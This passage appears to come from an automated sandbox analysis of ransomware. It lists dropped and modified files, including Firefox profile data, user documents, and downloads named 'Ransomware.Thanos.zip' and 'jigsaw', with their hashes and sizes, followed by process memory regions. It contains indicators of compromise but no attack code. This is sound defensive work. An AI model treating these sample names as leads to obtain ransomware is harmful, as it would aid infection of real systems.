                                                                                                                                                                                                                                                                        b273f431643c9bee85706dd585db65f4

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        f13b054dc3d3ca85f1b5ffe77dfc7e7c61d8d87b

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        77613c4aa1cbf8fd2727101f703f5009e1f4a2916d1adbbd1c210f2f1f81f279

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a61b57c9d954f899d659c312c426929a5f4117b6aa30239b3758b4832cf6a5a84f9a000e52242e9d8c9653503d7b3a9c70b86c34ed0a097621f20de9fdf89824

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\prefs-1.js

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        2a85dfa63eec5d4dadc03c4bdc20d34e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        069d62612a9502f387a7af02ec0c7c724a54f229

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e95e85ee485eefe45ce4860577ee50edbfda926a1709a892b1cef6e577727f85

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        ec4b52cf2c0c82cce2a6dbc108ad530be2161276fafe874d6814ea232a1b7f81af8933933d937dd5cfd4a71ba8100af9b2665a97f3e71579f65204f07fbdef59

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\prefs-1.js

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        12KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        71867aeb071b9c12e3d24c9530a61a21

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        156f61976b49daa11726909a358858675c000024

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        17e5218d98b9aa388114ba152a892aa7ded9da8aa9733ee97ea943a4d49c77a4

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        a46de0a14f804e74bcc1106d08ce79865382ddaca7139e6347c914d7d7bbc1ddbbdcaf3f6f9a740ae0f2b24f25dbd959f2b9932c827a00b80754909bfbcbecb5

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\prefs.js

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        11KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        1b9df1061dc6ee8f85cf0f7b0e8ac82e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        e0ff49eb11c38b4151b678ff82ed6f29df0c091f

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        3686dd68dd745751010004668fa0b9348d430cc2e409265cdcab154008331e53

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        32ece6c7bceb7300a9527271dfc149e0f36c9dc2e01c6ba5ec9390b5723545f54a002cc04acde01ea87beef47f46af61b2957808280cbae48feebc6044a820ac

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\sessionCheckpoints.json.tmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        259B

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e6c20f53d6714067f2b49d0e9ba8030e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        f516dc1084cdd8302b3e7f7167b905e603b6f04f

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        50a670fb78ff2712aae2c16d9499e01c15fddf24e229330d02a69b0527a38092

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        462415b8295c1cdcac0a7cb16bb8a027ef36ae2ce0b061071074ac3209332a7eae71de843af4b96bbbd6158ca8fd5c18147bf9a79b8a7768a9a35edce8b784bf

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        ce8358da0ca3b7b9e467ffe7e4980864

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        d9471a82a5c45ef5f3200a8ed6ef358c849a3bdf

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e303d1da6b98ae040645da21d541fe50a35c8568bcf8214f2f6e755fe9e54a7d

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        3a8d52344258b174d3c69908939ff4b1decae01814e76744e35fee8ea684aebb27150785a0cb6ed9281a9d222e15ed7964da1422738205da2dffa9daa8c63f4f

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        24d8cd8cfb6406e3fe5aa0fe1466e583

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        8522e882a60198b09569f221cfa838556d454821

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        170f8c1f8fde5936f63778f499dbde12d3ae3d0c3200d50d78acaf0259067ff5

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        64182dfe1e8299c949742e97c8a2f4931098638cd5614bc90dfd60eac5c47592ead991f0a0d8622230459fe02667a355e18d20fd0e1b0c6571515954c6602ba8

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        68e8a52a1d11e1f2cd974e22c91b3118

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        224e6f456852c602c031c5ddb7d57b9ac9beebba

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        41537a56873b9ab11542a759d6318c99634da567b281105a3f2d9e5ace5bec1e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        eaab41c7b8b01f3a3f432118865b3c936f438fd44356d5a0d1fb8a9ef09972af5252e91407bfab095332508636c029f1173deb0433f0eb7f4e35e1d98ed88e68

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\sessionstore-backups\recovery.baklz4

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        1KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        111a0f1a8d2a8a1fe41e63ac0c89369c

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        212b1242b2451b0176641d80343cf08f693b1a40

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        7e306c6f7afb62411a468b95d987824cf2eb291fdd64f727cef4b1c1350913a7

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        268e943c91bf1ac5329a475df909a0e3864b62994ba41968123b5d54606a5394c822c387133bc5d08a1cb95b533373160eb55a941aab3d0e68fb9e495176f33b

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\4.R5A

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        190KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e06df0d0eb876e785f7b86dba1b8d73a

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        14f553bf050c1dad9905aa615a536245c51199f1

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        754af875a5209900d0cfdc23b66e635ea8faeda4b34dc3d8a341c08ec3f2f523

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        aa2461ca915425f5ac671c533de7531134c3d3ab9a0b8d3e6a902b45ceab1bbe87a469991bf24de875faf2591a10557c7b3cee275347bb0ce131a1194eea0bb4

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\GetRegister.xlsx

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        250KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        6061e6e8fb9e60d68abfef1768c7fccc

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        dc0855aeddb1d78876d5b096c0ad5a2b2d3e9bd3

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        6187f7e7c8d012f9581ec290c1b4478e270105c404a6e4e5e4f1a97143d624d4

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        37b8338fbbff7d356aed21f764571f29d4ee7a26ef5e22fcf683a6a79464e9b0a09eac1d3ba53b59a45985030778e9da5a575547ee732fdeeb6a2622579d7aca

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\ResumePublish.doc

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        290KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        7fa2fa568f87ea3c51589b507bc4c822

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        c1a7f794b624be5a56a697ba990c499ab9614052

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        f44e88b6dada322d07f768bdcab659c3b647151298771bc30caebcb8fbf04c69

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        d5feb0ec9e9f74b962a922864fb74436285a2c0b8976f3e799c4f2ea00a97bc49a486cbb328ce02b128248740d7bca6319762bd66954b77f0ef6d1392b9374cb

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\Ransomware.Thanos.zip

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        145KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        00184463f3b071369d60353c692be6f0

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        d3c1e90f39da2997ef4888b54d706b1a1fde642a

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        cd0f55dd00111251cd580c7e7cc1d17448faf27e4ef39818d75ce330628c7787

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        baa931a23ecbcb15dda6a1dc46d65fd74b46ccea8891c48f0822a8a10092b7d4f7ea1dc971946a161ac861f0aa8b99362d5bea960b47b10f8c91e33d1b018006

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\Unconfirmed 538556.crdownload

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        424KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e263c5b306480143855655233f76dc5a

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        e7dcd6c23c72209ee5aa0890372de1ce52045815

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        1f69810b8fe71e30a8738278adf09dd982f7de0ab9891d296ce7ea61b3fa4f69

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        e95981eae02d0a8bf44493c64cca8b7e50023332e91d75164735a1d0e38138f358100c93633ff3a0652e1c12a5155cba77d81e01027422d7d5f71000eafb4113

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\Unconfirmed 798741.crdownload

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        315KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        9f8bc96c96d43ecb69f883388d228754

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        61ed25a706afa2f6684bb4d64f69c5fb29d20953

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\_0ri-JX3.part

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        87KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d6d956267a268c9dcf48445629d2803e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        cc0feae505dad9c140dd21d1b40b518d8e61b3a4

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

                                                                                                                                                                                                                                                                      • C:\Users\Admin\Downloads\jigsaw

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        283KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        2773e3dc59472296cb0024ba7715a64e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        27d99fbca067f478bb91cdbcb92f13a828b00859

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        3ae96f73d805e1d3995253db4d910300d8442ea603737a1428b613061e7f61e7

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        6ef530b209f8ec459cca66dbf2c31ec96c5f7d609f17fa3b877d276968032fbc6132ea4a45ed1450fb6c5d730a7c9349bf4481e28befaea6b119ec0ded842262

                                                                                                                                                                                                                                                                      • C:\vcredist2010_x86.log-MSI_vc_red.msi.txt

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        395KB

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        cce6650d08a0a4a497d7a4ebb4e60b78

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        43f69cac8a9ae0a2ff0430c56949668fa6089fff

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        dc3d5afd61fea0e69c139e6a48a9a1fcd5bef995809e6c6bb9b46fcfb8e67603

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        efe12aa4453c65c57aaf7f11a1c053013735fa8036982bc789eb6f434ceba16db3a62514d075d90a3739c4169887cc319053852b311a0046e9f9fa26a854a8d5

                                                                                                                                                                                                                                                                      • \??\pipe\LOCAL\crashpad_1356_EEOUZTHLHJWGRJNS

                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                      • memory/3488-1661-0x00000000050F0000-0x0000000005182000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        584KB

                                                                                                                                                                                                                                                                      • memory/3488-1663-0x0000000005030000-0x000000000503A000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        40KB

                                                                                                                                                                                                                                                                      • memory/5276-1657-0x0000000000F30000-0x0000000000FA2000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        456KB

                                                                                                                                                                                                                                                                      • memory/5276-1658-0x00000000057F0000-0x000000000588C000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        624KB

                                                                                                                                                                                                                                                                      • memory/5276-1660-0x0000000005E90000-0x0000000006434000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        5.6MB

                                                                                                                                                                                                                                                                      • memory/5276-1664-0x0000000005B10000-0x0000000005B66000-memory.dmp

                                                                                                                                                                                                                                                                        Filesize

                                                                                                                                                                                                                                                                        344KB